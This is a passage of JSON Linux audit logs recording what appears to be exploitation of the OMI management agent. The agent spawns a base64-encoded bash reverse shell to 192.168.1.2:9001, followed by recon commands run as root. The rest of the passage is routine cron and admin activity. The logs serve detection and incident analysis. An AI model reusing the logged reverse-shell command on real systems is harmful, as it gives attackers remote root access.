"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/sbin/logrotate",
"/etc/logrotate.d/scxagent",
"--state",
"/var/opt/microsoft/scx/log/scx-logrotate.status"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-c",
"/usr/sbin/logrotate /etc/logrotate.d/scxagent --state /var/opt/microsoft/scx/log/scx-logrotate.status >/dev/null 2>&1"
],
"launch_time": 1632470401.47,
"ppid": 7527
}
}
{
"ID": "1632470401.474:341",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7530,
"pid": 7532,
"auid": 0,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 7,
"comm": "logrotate",
"exe": "/usr/sbin/logrotate",
"key": "rootcmd",
"ARGV": [
"0x559acc7cb4a8",
"0x559acc7cb550",
"0x559acc7cb598",
"0x7f003ffa1850"
]
},
"EXECVE": {
"argc": 4,
"ARGV": [
"/usr/sbin/logrotate",
"/etc/logrotate.d/omi",
"--state",
"/var/opt/omi/log/omi-logrotate.status"
]
},
"CWD": {
"cwd": "/root"
},
"PATH": [
{
"item": 0,
"name": "/usr/sbin/logrotate",
"inode": 794142,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/sbin/logrotate",
"/etc/logrotate.d/omi",
"--state",
"/var/opt/omi/log/omi-logrotate.status"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-c",
"/usr/sbin/logrotate /etc/logrotate.d/omi --state /var/opt/omi/log/omi-logrotate.status >/dev/null 2>&1"
],
"launch_time": 1632470401.47,
"ppid": 7528
}
}
{
"ID": "1632470401.490:342",
"CRED_DISP": {
"pid": 7528,
"uid": 0,
"auid": 0,
"ses": 7,
"msg": "op=PAM:setcred grantors=pam_permit acct=\"root\" exe=\"/usr/sbin/cron\" hostname=? addr=? terminal=cron res=success"
}
}
{
"ID": "1632470401.490:343",
"USER_END": {
"pid": 7528,
"uid": 0,
"auid": 0,
"ses": 7,
"msg": "op=PAM:session_close grantors=pam_loginuid,pam_env,pam_env,pam_permit,pam_umask,pam_unix,pam_limits acct=\"root\" exe=\"/usr/sbin/cron\" hostname=? addr=? terminal=cron res=success"
}
}
{
"ID": "1632470401.490:344",
"CRED_DISP": {
"pid": 7527,
"uid": 0,
"auid": 0,
"ses": 6,
"msg": "op=PAM:setcred grantors=pam_permit acct=\"root\" exe=\"/usr/sbin/cron\" hostname=? addr=? terminal=cron res=success"
}
}
{
"ID": "1632470401.490:345",
"USER_END": {
"pid": 7527,
"uid": 0,
"auid": 0,
"ses": 6,
"msg": "op=PAM:session_close grantors=pam_loginuid,pam_env,pam_env,pam_permit,pam_umask,pam_unix,pam_limits acct=\"root\" exe=\"/usr/sbin/cron\" hostname=? addr=? terminal=cron res=success"
}
}
{
"ID": "1632470407.506:346",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7344,
"pid": 7534,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "sh",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x7f060000c080",
"0x7f060000ded0",
"0x7ffd56f445c8",
"0x7f06053ae3f0"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"/bin/sh",
"-c",
"echo -n YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjEuMi85MDAxIDA%2bJjE= | base64 -d | bash"
]
},
"CWD": {
"cwd": "/var/opt/microsoft/scx/tmp"
},
"PATH": [
{
"item": 0,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"-c",
"echo -n YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjEuMi85MDAxIDA%2bJjE= | base64 -d | bash"
]
},
"PARENT_INFO": {
"ARGV": [
"/opt/omi/bin/omiagent",
"9",
"10",
"--destdir",
"/",
"--providerdir",
"/opt/omi/lib",
"--loglevel",
"WARNING"
],
"launch_time": 1632469820.563,
"ppid": 719
}
}
{
"ID": "1632470407.506:347",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7534,
"pid": 7537,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "bash",
"exe": "/usr/bin/bash",
"key": "rootcmd",
"ARGV": [
"0x559655dbc588",
"0x559655dbc538",
"0x559655dbc548",
"0x7f7506257850"
]
},
"EXECVE": {
"argc": 1,
"ARGV": [
"bash"
]
},
"CWD": {
"cwd": "/var/opt/microsoft/scx/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/bash",
"inode": 786916,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"bash"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-c",
"echo -n YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjEuMi85MDAxIDA%2bJjE= | base64 -d | bash"
],
"launch_time": 1632470407.506,
"ppid": 7344
}
}
{
"ID": "1632470407.506:348",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7534,
"pid": 7536,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "base64",
"exe": "/usr/bin/base64",
"key": "susp_activity",
"ARGV": [
"0x559655dbc5a8",
"0x559655dbc550",
"0x559655dbc568",
"0x7f7506257850"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"base64",
"-d"
]
},
"CWD": {
"cwd": "/var/opt/microsoft/scx/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/base64",
"inode": 786914,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"base64",
"-d"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"-c",
"echo -n YmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjEuMi85MDAxIDA%2bJjE= | base64 -d | bash"
],
"launch_time": 1632470407.506,
"ppid": 7344
}
}
{
"ID": "1632470407.510:349",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 42,
"success": "yes",
"exit": 0,
"items": 0,
"ppid": 7537,
"pid": 7538,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "bash",
"exe": "/usr/bin/bash",
"key": "network_connect_4",
"ARGV": [
"0x3",
"0x5568e590ef90",
"0x10",
"0x0"
]
},
"SOCKADDR": [
{
"saddr": "%02%00#)%c0%a8%01%02%00%00%00%00%00%00%00%00"
}
],
"PROCTITLE": {
"ARGV": [
"bash"
]
},
"PARENT_INFO": {
"ARGV": [
"bash"
],
"launch_time": 1632470407.506,
"ppid": 7534
}
}
{
"ID": "1632470407.522:350",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7537,
"pid": 7538,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "bash",
"exe": "/usr/bin/bash",
"key": "rootcmd",
"ARGV": [
"0x5568e590eb80",
"0x5568e590ef40",
"0x5568e590d050",
"0x0"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"bash",
"-i"
]
},
"CWD": {
"cwd": "/var/opt/microsoft/scx/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/bash",
"inode": 786916,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"bash"
]
},
"PARENT_INFO": {
"ARGV": [
"bash"
],
"launch_time": 1632470407.506,
"ppid": 7534
}
}
{
"ID": "1632470407.522:351",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7538,
"pid": 7539,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "groups",
"exe": "/usr/bin/groups",
"key": "rootcmd",
"ARGV": [
"0x55bc4a2db620",
"0x55bc4a2db800",
"0x55bc4a2dbf50",
"0x8"
]
},
"EXECVE": {
"argc": 1,
"ARGV": [
"groups"
]
},
"CWD": {
"cwd": "/var/opt/microsoft/scx/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/groups",
"inode": 787128,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"groups"
]
},
"PARENT_INFO": {
"ARGV": [
"bash",
"-i"
],
"launch_time": 1632470407.522,
"ppid": 7537
}
}
{
"ID": "1632470407.522:352",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 3,
"ppid": 7538,
"pid": 7540,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "lesspipe",
"exe": "/usr/bin/dash",
"key": "rootcmd",
"ARGV": [
"0x55bc4a2da2a0",
"0x55bc4a2d9420",
"0x55bc4a2d91f0",
"0x8"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/bin/sh",
"/usr/bin/lesspipe"
]
},
"CWD": {
"cwd": "/var/opt/microsoft/scx/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/lesspipe",
"inode": 787181,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/bin/sh",
"inode": 787014,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/bin/sh",
"/usr/bin/lesspipe"
]
},
"PARENT_INFO": {
"ARGV": [
"bash",
"-i"
],
"launch_time": 1632470407.522,
"ppid": 7537
}
}
{
"ID": "1632470407.526:353",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7540,
"pid": 7541,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "basename",
"exe": "/usr/bin/basename",
"key": "rootcmd",
"ARGV": [
"0x55a9da858c90",
"0x55a9da858c20",
"0x55a9da858c38",
"0x7f44c2c37ac0"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"basename",
"/usr/bin/lesspipe"
]
},
"CWD": {
"cwd": "/var/opt/microsoft/scx/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/basename",
"inode": 786915,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"basename",
"/usr/bin/lesspipe"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/usr/bin/lesspipe"
],
"launch_time": 1632470407.522,
"ppid": 7538
}
}
{
"ID": "1632470407.526:354",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7542,
"pid": 7543,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "dirname",
"exe": "/usr/bin/dirname",
"key": "rootcmd",
"ARGV": [
"0x55a9daa1a9a0",
"0x55a9daa1a910",
"0x55a9daa1a948",
"0x7f44c2c37ac0"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"dirname",
"/usr/bin/lesspipe"
]
},
"CWD": {
"cwd": "/var/opt/microsoft/scx/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dirname",
"inode": 787048,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dirname",
"/usr/bin/lesspipe"
]
},
"PARENT_INFO": {
"ARGV": [
"/bin/sh",
"/usr/bin/lesspipe"
],
"launch_time": 1632470407.523,
"ppid": 7540
}
}
{
"ID": "1632470407.530:355",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7538,
"pid": 7544,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "dircolors",
"exe": "/usr/bin/dircolors",
"key": "rootcmd",
"ARGV": [
"0x55bc4a2dfa10",
"0x55bc4a2dfe50",
"0x55bc4a2df760",
"0x8"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"dircolors",
"-b"
]
},
"CWD": {
"cwd": "/var/opt/microsoft/scx/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dircolors",
"inode": 787045,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"dircolors",
"-b"
]
},
"PARENT_INFO": {
"ARGV": [
"bash",
"-i"
],
"launch_time": 1632470407.522,
"ppid": 7537
}
}
{
"ID": "1632470411.690:356",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7538,
"pid": 7545,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "id",
"exe": "/usr/bin/id",
"key": "recon",
"ARGV": [
"0x55bc4a3110a0",
"0x55bc4a311380",
"0x55bc4a311120",
"0x8"
]
},
"EXECVE": {
"argc": 1,
"ARGV": [
"id"
]
},
"CWD": {
"cwd": "/var/opt/microsoft/scx/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/id",
"inode": 787145,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"id"
]
},
"PARENT_INFO": {
"ARGV": [
"bash",
"-i"
],
"launch_time": 1632470407.522,
"ppid": 7537
}
}
{
"ID": "1632470415.362:357",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7538,
"pid": 7546,
"auid": 4294967295,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "(none)",
"ses": 4294967295,
"comm": "whoami",
"exe": "/usr/bin/whoami",
"key": "recon",
"ARGV": [
"0x55bc4a311430",
"0x55bc4a311360",
"0x55bc4a311120",
"0x8"
]
},
"EXECVE": {
"argc": 1,
"ARGV": [
"whoami"
]
},
"CWD": {
"cwd": "/var/opt/microsoft/scx/tmp"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/whoami",
"inode": 787640,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"whoami"
]
},
"PARENT_INFO": {
"ARGV": [
"bash",
"-i"
],
"launch_time": 1632470407.522,
"ppid": 7537
}
}
{
"ID": "1632470453.685:358",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7574,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "cat",
"exe": "/usr/bin/cat",
"key": "rootcmd",
"ARGV": [
"0x55b23e89a3e0",
"0x55b23e8900f0",
"0x55b23e8632e0",
"0x8"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"cat",
"/var/log/laurel/audit.log"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/cat",
"inode": 786968,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"cat",
"/var/log/laurel/audit.log"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.349:359",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "software_mgmt",
"ARGV": [
"0x55b23e88c450",
"0x55b23e89ca70",
"0x55b23e8632e0",
"0x8"
]
},
"EXECVE": {
"argc": 3,
"ARGV": [
"apt",
"install",
"jq"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/apt",
"inode": 786869,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.353:360",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 59,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 7575,
"pid": 7576,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "software_mgmt",
"ARGV": [
"0x564c55035ad0",
"0x564c55035b10",
"0x7ffe41acdc68",
"0x564c5500b010"
]
},
"EXECVE": {
"argc": 2,
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/usr/bin/dpkg",
"inode": 787051,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/lib64/ld-linux-x86-64.so.2",
"inode": 793514,
"dev": "fd:00",
"mode": "0o100755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--print-foreign-architectures"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470474.357:361",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
"0x180"
]
},
"CWD": {
"cwd": "/etc/audit/rules.d"
},
"PATH": [
{
"item": 0,
"name": "/tmp/",
"inode": 524291,
"dev": "fd:00",
"mode": "0o41777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/tmp/clearsigned.message.a4Co90",
"inode": 533270,
"dev": "fd:00",
"mode": "0o100600",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"apt",
"install",
"jq"
]
},
"PARENT_INFO": {
"ARGV": [
"-bash"
],
"launch_time": 1632468643.773,
"ppid": 1184
}
}
{
"ID": "1632470474.365:362",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 87,
"success": "yes",
"exit": 0,
"items": 2,
"ppid": 1185,
"pid": 7575,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts0",
"ses": 3,
"comm": "apt",
"exe": "/usr/bin/apt",
"key": "delete",
"ARGV": [
"0x7ffe41acc3d0",
"0x7ffe41acc3d0",
"0xc2",
